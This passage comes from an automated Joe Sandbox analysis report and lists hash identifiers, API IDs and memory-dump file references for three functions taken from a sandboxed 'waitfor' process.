                                                                                                                • API String ID: 0-3454608543
                                                                                                                • Opcode ID: e94a3d83ea83a161a1fbd5a7129fce51fc4a760f4d21ba55dd701e68776cf658
                                                                                                                • Instruction ID: 035c09d40a531a6aa5a2d66163aa5af20138afe6c583a1e43e8e544c16cf9462
                                                                                                                • Opcode Fuzzy Hash: e94a3d83ea83a161a1fbd5a7129fce51fc4a760f4d21ba55dd701e68776cf658
                                                                                                                • Instruction Fuzzy Hash: 3FF0B47002C7444FC704AF14D844596B7E5FF8930CF801B9CE88ADB142D779D6458B86
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-
                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction ID: ff0b5460fa5dc5610cf1d2d6d8c9036e395af9cd8b83a670e2a4c1f1e99d862a
                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction Fuzzy Hash: F1918271E202169BDF3CDE69C881ABEB7B5EF44720F54491AE865EB3C0E730A9418761
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$@
                                                                                                                • API String ID: 0-1194432280
                                                                                                                • Opcode ID: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                                                • Instruction ID: f863d8b42fb40ff9630054135117c4f3dbed7dbff1843afedba06ef8e3ea0fad
                                                                                                                • Opcode Fuzzy Hash: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                                                • Instruction Fuzzy Hash: 3A810AB1D002699BDB35CB54CC45BEAB7B4AB48714F0045DAEA19B7780E731AE84DFA0
                                                                                                                APIs
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0481CFBD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                • String ID: @$@4rw@4rw
                                                                                                                • API String ID: 4062629308-2979693914
                                                                                                                • Opcode ID: 28632e6ab10916a9119b4a2f05d4ea77c2e01d1efae194f2b30fbd70b33ee138
                                                                                                                • Instruction ID: 32eedaca3af5c81c495a3b77d7ceafcbc1cd0609070c6e8df1ef4d714f27855d
                                                                                                                • Opcode Fuzzy Hash: 28632e6ab10916a9119b4a2f05d4ea77c2e01d1efae194f2b30fbd70b33ee138
                                                                                                                • Instruction Fuzzy Hash: BB418171A40214DFDB21AFA9D844A6DBBF8EF44B04F004A2EE915EB365E774F801CB51